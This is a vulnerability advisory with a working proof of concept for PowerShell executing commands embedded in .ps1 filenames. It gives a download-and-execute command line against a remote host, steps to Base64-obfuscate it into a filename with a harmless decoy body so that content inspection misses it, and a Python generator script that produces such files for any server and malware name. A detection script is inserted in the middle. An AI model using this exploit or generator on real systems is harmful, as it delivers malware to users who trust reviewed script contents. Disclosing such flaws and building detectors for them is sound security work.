[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file,
or the running of unexpected commands straight from the filename itself without the need for a second file.
The trojan file doesn't need to be another PowerShell script and can be one of the following: .com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
However, when such scripts are run from PowerShell's own shell and not "cmd.exe", the "&" (call operator) will block our exploit from working.
Still, if the user has enabled ".ps1" scripts to open with PowerShell as their default program, all it takes is a double-click on the file to trigger
the exploit and the "&" call operator will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
by default, then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
My PoC will download a remote executable, save it to the victim's machine and then execute it; the PS file's contents are irrelevant.
Also, note I use "%CD%" to target the current working directory where the victim has initially opened it. After it calls "iwr" (Invoke-WebRequest,
abbreviated for space) it sleeps for 2 seconds and finally executes.
C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
This can undermine the integrity of PowerShell as it potentially allows unexpected code execution, even when the script's contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that look at the contents or header of a file but not its filename, where
commands can be stored.
For this to work the user must have enabled PowerShell as the default program for opening ".ps1" files.
First, we create a Base64 encoded filename for obfuscation that will download and execute a remote executable, named in this case "n.exe".
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
Give the PS script a normal beginning name, then separate commands using the ";" semicolon, e.g.
Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
Create the executable without a file extension to save space in the filename, then restore the extension when saving it with the -O parameter.
The "-e" is the abbreviation for -EncodedCommand, again to save filename space.
Host the executable on a web server, or just use python -m SimpleHTTPServer 80 or whatever.
Double-click to open in PowerShell and watch the file get downloaded, saved and executed!
My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
Note: User interaction is required, and obviously running any random PS script is dangerous... but hey, we looked at the file content and it simply printed a string!
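As a defender-side check added here (it is not part of the original advisory), the following Python flags .ps1 filenames that carry command separators or an embedded -EncodedCommand argument, and decodes the latter (Base64 over UTF-16LE) so an analyst can see what the name itself would run. The sample filenames and the benign payload are constructed for the demonstration.

```python
import base64
import re
from pathlib import Path
from typing import Dict, List, Optional

# ";" and "&" separate statements once a name is treated as a command line, and a
# space plus a switch (e.g. "-e") makes the name read like an invocation.
SEPARATORS = re.compile(r"[;&]")
# "-e", "-ec", "-enc" and "-EncodedCommand" are accepted prefixes of the same switch.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(blob: str) -> Optional[str]:
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE text; None if not decodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_script_name(filename: str) -> Dict[str, object]:
    """Verdict for one .ps1 filename; the file contents are deliberately not consulted."""
    stem = filename[:-4] if filename.lower().endswith(".ps1") else filename
    reasons: List[str] = []
    decoded = None
    if SEPARATORS.search(stem):
        reasons.append("command separator in filename")
    if " " in stem and "-" in stem:
        reasons.append("filename reads like a command line (space and switch)")
    match = ENCODED_ARG.search(stem)
    if match:
        decoded = decode_encoded_command(match.group(1))
        reasons.append("embedded -EncodedCommand payload" + ("" if decoded else " (undecodable)"))
    return {"name": filename, "suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


def scan_directory(path: str) -> List[Dict[str, object]]:
    """Apply the check to every .ps1 in a directory (non-recursive)."""
    return [assess_script_name(p.name) for p in Path(path).iterdir() if p.suffix.lower() == ".ps1"]


# Constructed sample names (not from a real incident). The second follows the advisory's
# "Test;powershell -e <BASE64>;2.ps1" pattern, but with a harmless Write-Host payload.
_BENIGN_PAYLOAD = base64.b64encode("Write-Host 'sample'".encode("utf-16-le")).decode("ascii")
SAMPLE_NAMES = [
    "Deploy-Agent.ps1",
    "Test;powershell -e " + _BENIGN_PAYLOAD + ";2.ps1",
    "Hello;World.ps1",
]

if __name__ == "__main__":
    for verdict in (assess_script_name(n) for n in SAMPLE_NAMES):
        print(verdict)
```

Point scan_directory at a script share or download folder to get the same verdicts for every .ps1 there.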
[Exploit / PoC]

    from base64 import b64encode
    import argparse
    import sys

    # Windows PowerShell - Unsanitized Filename Command Execution Vulnerability PoC
    # Create ".ps1" files with embedded commands to download, save and execute malware within a PowerShell script filename.
    # Expects hostname/ip-addr of web server housing the exploit.
    # By hyp3rlinx
    # Apparition Security
    # ====================

    def parse_args():
        parser = argparse.ArgumentParser()
        parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
        parser.add_argument("-m", "--local_malware_name", help="Name for the malware after downloading.")
        parser.add_argument("-r", "--remote_malware_name", help="Malware's name on remote server.")
        if len(sys.argv) == 1:
            parser.print_help(sys.stderr)
            sys.exit(1)
        return parser.parse_args()

    def main(args):
        PSEmbedFilenameMalwr = ""
        if args.ipaddress:
            PSEmbedFilenameMalwr = "powershell iwr " + args.ipaddress + "/" + args.remote_malware_name + " -O %CD%\\" + args.local_malware_name + " ;sleep -s 2;start " + args.local_malware_name
        # -EncodedCommand expects Base64 over UTF-16LE text; decode to str so it can be joined into the filename.
        return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode('ascii')

    def create_file(payload):
        # The commands live in the filename; the script body itself is a harmless decoy.
        with open("Test;PowerShell -e " + payload + ";2.ps1", "w") as f:
            f.write("Write-Output 'Have a nice day!'")

    if __name__ == "__main__":
        PSCmds = main(parse_args())
        create_file(PSCmds)
        print("PowerShell - Unsanitized Filename Command Execution File created!")
        print("By hyp3rlinx")
[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4